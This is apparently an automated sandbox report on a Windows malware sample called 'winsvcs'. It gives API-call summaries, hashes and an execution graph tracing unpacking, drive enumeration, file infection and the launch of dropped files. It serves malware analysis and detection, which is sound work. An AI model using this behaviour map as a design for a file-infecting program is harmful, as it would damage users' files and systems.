                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
                                                                                                                                                                                                                          • Instruction ID: 262968f47342c6bcf14978d3074c3fef03dfaca683abf3537834e770978e0ce4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E042B1299614BAF65117B09C4EFFA362DEB14B02F106420F792E91D0CAF86D428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3A8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F3B8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F3C0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F3CC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F3DB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
                                                                                                                                                                                                                          • Instruction ID: 510ba6cb99a25d9121a1dffcbb3beb8f5a9f0f327987106bb48a6d04e3a7d157
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E04C712897147EF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F7BB
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F7CB
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F7D3
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F7DF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7EE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
                                                                                                                                                                                                                          • Instruction ID: fc2c61729b590515bdfd3972ace7de4b77c4262dfd1b686aa39bd5981164a283
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004335DE
                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00433612
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000000,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 00433643
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000001,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 004336B1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                          • Opcode ID: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
                                                                                                                                                                                                                          • Instruction ID: 311c7ba4c8e43137f5e4a7efccb9debf39a4ffc4a742db9a7ca4f6796694eb12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3631C031604246FFDB20DF64C8869AB7BA0FF09312F1495AAE4618B291DB34DE40DB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0041FE50: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,00418EB0), ref: 0041FE6C
                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004144FD
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004145D1
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 004145E2
                                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(?), ref: 00414615
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 004146A8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 004146ED
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Global$Long$AllocDestroyExceptionRaiseRedrawWire_memcpy_slstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 445683731-0
                                                                                                                                                                                                                          • Opcode ID: 712bff58e48d1d3e9ee6eae366ca218e909d329bee0dcfb226d7fb1febb92fb0
                                                                                                                                                                                                                          • Instruction ID: de7e53ce0f83194f635cf1e79a54ce0f96a2c22e459a526417b3a054ee68208e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 712bff58e48d1d3e9ee6eae366ca218e909d329bee0dcfb226d7fb1febb92fb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C931A131204206EFDB10CF24DC44BDB77A5AF94B18F14422AFD09A62A1DB78CC85DB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$String_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1108949412-0
                                                                                                                                                                                                                          • Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00411A70), ref: 00423DC1
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423DC8
                                                                                                                                                                                                                            • Part of subcall function 00423CD9: IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00423DEA
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00423E17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapVirtual$AllocAllocateFeatureFreePresentProcessProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2677508003-0
                                                                                                                                                                                                                          • Opcode ID: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
                                                                                                                                                                                                                          • Instruction ID: 33552fc1f294df3a2b2b113b899d939f80dfa8ae59bb1af21b4907c51dd0f451
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83016135304221A7EB311F6ABC09B673676EB85B02F950036F901E62A0CB6CCD41869C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction ID: 778b9b8891b73742fb5b30d1044a06d15375a4591dad267e5ab082aca22325bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B03250005EFBCF125E86EC11CEE3F26BF18354B888856FE1958131C63AD9B2AB95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?), ref: 004171AE
                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004171DA
                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004171E1
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 004171EE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteRectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2015589292-0
                                                                                                                                                                                                                          • Opcode ID: e9618994a7d80b2474913c7f5678e94403ae5413d734db9b7ce1413f5d86d94e
                                                                                                                                                                                                                          • Instruction ID: 6d328489f22ecbc7905818d7d901272752b0576e7d789662292b68c01cb6154c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9618994a7d80b2474913c7f5678e94403ae5413d734db9b7ce1413f5d86d94e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E101FB72108204AFD711AF64DC08E6BBBF9FB8C320F01892DF99982261D771AC55CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042C356
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042C36D
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0042C37B
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0042C38B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3521780317-0
                                                                                                                                                                                                                          • Opcode ID: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
                                                                                                                                                                                                                          • Instruction ID: 1f90ef54278d78fe482f5476074c301cb1ab8b2a9e1e54857d71ca385ae67bc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF06D32B40720DADB20EBB6B54674E33A0AB00724FD58A5FF800A7291CB6C5802DB5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception@8Throw_memcpy_s
                                                                                                                                                                                                                          • String ID: list<T> too long
                                                                                                                                                                                                                          • API String ID: 4160651998-4027344264
                                                                                                                                                                                                                          • Opcode ID: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
                                                                                                                                                                                                                          • Instruction ID: 87061816adbd77505f6fdf6fe6a369285cef3fe4ca098932c01a2f47f64931ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E21BF706483008FD710DE15C84076FBAE1BB98308F604E1EF5D557682C7B9DA898B8B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception@8Throw_memcpy_s
                                                                                                                                                                                                                          • String ID: deque<T> too long
                                                                                                                                                                                                                          • API String ID: 4160651998-309773918
                                                                                                                                                                                                                          • Opcode ID: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
                                                                                                                                                                                                                          • Instruction ID: 76a7e499c38a90962a59699183f8a2dce48751c19508e120701b83a76bc7192f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721B0707483409FD710DF55C84066FB7E1AB98308F504E0EF5D117682C7B8E9898B9B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 803148776-1018135373
                                                                                                                                                                                                                          • Opcode ID: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
                                                                                                                                                                                                                          • Instruction ID: 2cfbca0fe2cdbec7ade19a9cc29750f231db107eaf6571eb885056c95e9ab353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601A234A01328EACF35DF62E44066EB3B9AF00311FD4486FE84096751CF389D91EB69

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:27.2%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:10.3%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:302
                                                                                                                                                                                                                          Total number of Limit Nodes:11
                                                                                                                                                                                                                          execution_graph 1020 6e615c 1021 6e615f VirtualFree 1020->1021 1025 6e60c7 1021->1025 1022 6e6198 VirtualFree 1026 6e61b2 1022->1026 1023 6e60d5 VirtualAlloc 1023->1025 1024 6e6389 VirtualProtect 1027 6e63b7 1024->1027 1025->1021 1025->1022 1025->1023 1026->1024 1031 6e62fb 1026->1031 1028 6e63fc VirtualProtect 1027->1028 1030 6e63e7 VirtualProtect 1027->1030 1029 6e6400 1028->1029 1030->1027 1030->1028 1032 6e6076 1033 6e60c7 1032->1033 1034 6e607b 1032->1034 1035 6e615f VirtualFree 1033->1035 1037 6e6198 VirtualFree 1033->1037 1038 6e60d5 VirtualAlloc 1033->1038 1034->1033 1036 6e60b0 VirtualAlloc 1034->1036 1044 6e61b2 1034->1044 1035->1033 1036->1033 1037->1044 1038->1033 1039 6e6389 VirtualProtect 1042 6e63b7 1039->1042 1040 6e63fc VirtualProtect 1041 6e6400 1040->1041 1042->1040 1043 6e63e7 VirtualProtect 1042->1043 1043->1040 1043->1042 1044->1039 1045 6e62fb 1044->1045 1353 6e6014 1354 6e6035 GetModuleHandleA 1353->1354 1357 6e605f 1353->1357 1355 6e604d GetProcAddress 1354->1355 1356 6e6058 1355->1356 1356->1355 1356->1356 1356->1357 1046 6e14e1 1047 6e14fd GetModuleHandleA 1046->1047 1048 6e1541 1046->1048 1051 6e151a VirtualQuery 1047->1051 1052 6e1512 1047->1052 1049 6e1549 1048->1049 1050 6e1573 1048->1050 1053 6e1569 1049->1053 1055 6e1557 1049->1055 1059 6e1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1050->1059 1051->1052 1052->1048 1075 6e1af9 1055->1075 1056 6e1579 ExitProcess 1058 6e1566 1058->1053 1060 6e167f 1059->1060 1061 6e167a 1059->1061 1081 6e1718 GetSystemTimeAsFileTime 1060->1081 1099 6e139f GetVersionExA 1061->1099 1064 6e16ca 1065 6e16d7 1064->1065 1066 6e16d0 1064->1066 1069 6e16d5 1065->1069 1070 6e16dd lstrcpy 1065->1070 1093 6e1581 1066->1093 1067 6e1686 1067->1064 1071 6e16a0 CreateThread 1067->1071 1069->1056 1070->1056 1086 6e2c48 memset 1071->1086 1333 6e1099 1071->1333 1074 6e1718 3 API calls 1074->1064 1076 6e1b09 1075->1076 1077 6e1b11 1075->1077 1078 6e1638 188 API calls 1076->1078 1079 6e1b16 CreateThread 1077->1079 1080 6e1b0f 1077->1080 1078->1080 1079->1080 1352 6e1638 189 API calls 1079->1352 1080->1058 1080->1080 1082 6e1754 1081->1082 1083 6e1735 SHSetValueA 1081->1083 1084 6e175a SHGetValueA 1082->1084 1085 6e1786 __aulldiv 1082->1085 1083->1085 1084->1085 1085->1067 1120 6e1973 PathFileExistsA 1086->1120 1089 6e2cb2 1091 6e2cbb VirtualFree 1089->1091 1092 6e16ba WaitForSingleObject 1089->1092 1090 6e2c8f CreateThread WaitForMultipleObjects 1090->1089 1142 6e2b8c memset GetLogicalDriveStringsA 1090->1142 1091->1092 1092->1074 1313 6e185b GetSystemTimeAsFileTime srand rand srand rand 1093->1313 1095 6e1592 wsprintfA wsprintfA lstrlen CreateFileA 1096 6e15fb WriteFile CloseHandle 1095->1096 1097 6e1633 1095->1097 1096->1097 1098 6e161d ShellExecuteA 1096->1098 1097->1069 1098->1097 1100 6e13cf LookupPrivilegeValueA 1099->1100 1101 6e14da 1099->1101 1102 6e13e7 1100->1102 1103 6e13ef 1100->1103 1101->1060 1314 6e119f GetCurrentProcess OpenProcessToken 1102->1314 1103->1101 1319 6e120e GetModuleHandleA GetProcAddress 1103->1319 1109 6e1448 GetCurrentProcessId 1109->1101 1110 6e1457 1109->1110 1110->1101 1111 6e1319 3 API calls 1110->1111 1112 6e147f 1111->1112 1113 6e1319 3 API calls 1112->1113 1114 6e148e 1113->1114 1114->1101 1115 6e1319 3 API calls 1114->1115 1116 6e14b4 1115->1116 1117 6e1319 3 API calls 1116->1117 1118 6e14c3 1117->1118 1119 6e1319 3 API calls 1118->1119 1119->1101 1121 6e19a0 1120->1121 1122 6e1ac7 1120->1122 1123 6e19af CreateFileA 1121->1123 1122->1089 1122->1090 1124 6e1a28 GetFileSize 1123->1124 1125 6e19c4 Sleep 1123->1125 1126 6e1a38 1124->1126 1138 6e1a80 1124->1138 1125->1123 1127 6e19d5 1125->1127 1128 6e1a3d VirtualAlloc 1126->1128 1126->1138 1141 6e185b GetSystemTimeAsFileTime srand rand srand rand 1127->1141 1133 6e1a53 1128->1133 1128->1138 1129 6e1a8d FindCloseChangeNotification 1130 6e1a96 1129->1130 1134 6e1a9c DeleteFileA 1130->1134 1135 6e1aad 1130->1135 1132 6e19da wsprintfA CopyFileA 1132->1124 1136 6e1a0d CreateFileA 1132->1136 1137 6e1a59 ReadFile 1133->1137 1133->1138 1134->1135 1135->1122 1140 6e1ab8 VirtualFree 1135->1140 1136->1124 1136->1134 1137->1133 1137->1138 1138->1129 1138->1130 1140->1122 1141->1132 1143 6e2c09 WaitForMultipleObjects 1142->1143 1148 6e2bc8 1142->1148 1145 6e2c3c 1143->1145 1146 6e2c2a CreateThread 1143->1146 1144 6e2bfa lstrlen 1144->1143 1144->1148 1146->1145 1153 6e2845 1146->1153 1147 6e2bd2 GetDriveTypeA 1147->1144 1147->1148 1148->1144 1148->1147 1149 6e2be3 CreateThread 1148->1149 1149->1144 1150 6e2b7d 1149->1150 1164 6e29e2 memset wsprintfA 1150->1164 1303 6e274a memset memset SHGetSpecialFolderPathA wsprintfA 1153->1303 1155 6e2878 DeleteFileA 1156 6e288c VirtualFree 1155->1156 1157 6e289a 1155->1157 1156->1157 1159 6e28ab 1157->1159 1160 6e28a4 CloseHandle 1157->1160 1158 6e2692 8 API calls 1161 6e2853 1158->1161 1160->1159 1161->1155 1161->1158 1162 6e2859 1161->1162 1163 6e239d 186 API calls 1162->1163 1163->1161 1165 6e2abc memset memset FindFirstFileA 1164->1165 1166 6e2a3a memset lstrlen lstrcpyn strrchr 1164->1166 1178 6e28b8 memset wsprintfA 1165->1178 1166->1165 1167 6e2a88 1166->1167 1167->1165 1169 6e2a9a lstrcmpiA 1167->1169 1171 6e2aad lstrlen 1169->1171 1172 6e2b74 1169->1172 1171->1165 1171->1169 1173 6e2b61 FindNextFileA 1174 6e2b6d FindClose 1173->1174 1175 6e2b23 1173->1175 1174->1172 1176 6e2b35 lstrcmpiA 1175->1176 1177 6e28b8 174 API calls 1175->1177 1176->1174 1176->1175 1177->1173 1179 6e2951 memset 1178->1179 1180 6e2905 1178->1180 1179->1173 1180->1179 1181 6e291b memset wsprintfA 1180->1181 1182 6e2956 strrchr 1180->1182 1183 6e29e2 180 API calls 1181->1183 1182->1179 1184 6e2967 lstrcmpiA 1182->1184 1183->1179 1185 6e297a 1184->1185 1186 6e2988 lstrcmpiA 1184->1186 1196 6e1e6e 1185->1196 1186->1179 1189 6e2994 1186->1189 1188 6e29ad strstr 1190 6e29cb 1188->1190 1191 6e29d3 1188->1191 1189->1188 1192 6e29a5 lstrcpy 1189->1192 1241 6e239d strstr 1190->1241 1263 6e2692 1191->1263 1192->1188 1197 6e1e7d 1196->1197 1272 6e1df6 strrchr 1197->1272 1200 6e2332 1204 6e233d UnmapViewOfFile 1200->1204 1205 6e2346 1200->1205 1201 6e1eb0 SetFileAttributesA CreateFileA 1201->1200 1202 6e1edf 1201->1202 1277 6e1915 1202->1277 1204->1205 1207 6e234b CloseHandle 1205->1207 1208 6e2350 1205->1208 1207->1208 1209 6e2356 CloseHandle 1208->1209 1210 6e2391 1208->1210 1209->1210 1210->1179 1211 6e1f2e 1211->1200 1283 6e1c81 1211->1283 1215 6e1f92 1216 6e1c81 2 API calls 1215->1216 1217 6e1f9f 1216->1217 1217->1200 1218 6e1fb6 1217->1218 1221 6e2024 1217->1221 1219 6e1af9 169 API calls 1218->1219 1225 6e1fc0 1219->1225 1220 6e2070 1222 6e1af9 169 API calls 1220->1222 1221->1200 1221->1220 1223 6e207a 1222->1223 1224 6e1af9 169 API calls 1223->1224 1229 6e2090 1224->1229 1225->1200 1225->1221 1226 6e1af9 169 API calls 1225->1226 1227 6e1ffe 1226->1227 1228 6e2013 FlushViewOfFile 1227->1228 1228->1221 1230 6e20bb memset memset 1229->1230 1231 6e20f5 1230->1231 1232 6e1c81 2 API calls 1231->1232 1234 6e21de 1232->1234 1233 6e2226 memcpy UnmapViewOfFile CloseHandle 1288 6e1b8a 1233->1288 1234->1233 1236 6e226e 1296 6e185b GetSystemTimeAsFileTime srand rand srand rand 1236->1296 1238 6e22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1239 6e1915 3 API calls 1238->1239 1240 6e231f CloseHandle 1239->1240 1240->1200 1242 6e2451 CreateFileA GetFileSize 1241->1242 1248 6e23d8 1241->1248 1243 6e2675 CloseHandle 1242->1243 1244 6e2480 1242->1244 1245 6e267c RemoveDirectoryA 1243->1245 1244->1243 1246 6e2499 1244->1246 1247 6e2687 1245->1247 1249 6e1915 3 API calls 1246->1249 1247->1179 1248->1242 1248->1247 1250 6e24a4 9 API calls 1249->1250 1298 6e189d memset CreateProcessA 1250->1298 1253 6e255c Sleep memset wsprintfA 1254 6e29e2 163 API calls 1253->1254 1255 6e2597 memset wsprintfA Sleep 1254->1255 1256 6e189d 6 API calls 1255->1256 1257 6e25e4 Sleep CreateFileA 1256->1257 1258 6e1915 3 API calls 1257->1258 1259 6e2610 CloseHandle 1258->1259 1259->1245 1260 6e261e 1259->1260 1260->1245 1261 6e2641 SetFilePointer WriteFile 1260->1261 1261->1245 1262 6e2667 SetEndOfFile 1261->1262 1262->1245 1264 6e26b2 WaitForSingleObject 1263->1264 1265 6e26a2 CreateEventA 1263->1265 1266 6e2708 1264->1266 1267 6e26c1 lstrlen ??2@YAPAXI 1264->1267 1265->1264 1268 6e2736 SetEvent 1266->1268 1271 6e2718 lstrcpy ??3@YAXPAX 1266->1271 1267->1268 1269 6e26da lstrcpy 1267->1269 1268->1179 1270 6e26f1 1269->1270 1270->1268 1271->1270 1273 6e1e62 1272->1273 1274 6e1e13 lstrcpy strrchr 1272->1274 1273->1200 1273->1201 1274->1273 1275 6e1e40 lstrcmpiA 1274->1275 1275->1273 1276 6e1e52 lstrlen 1275->1276 1276->1273 1276->1275 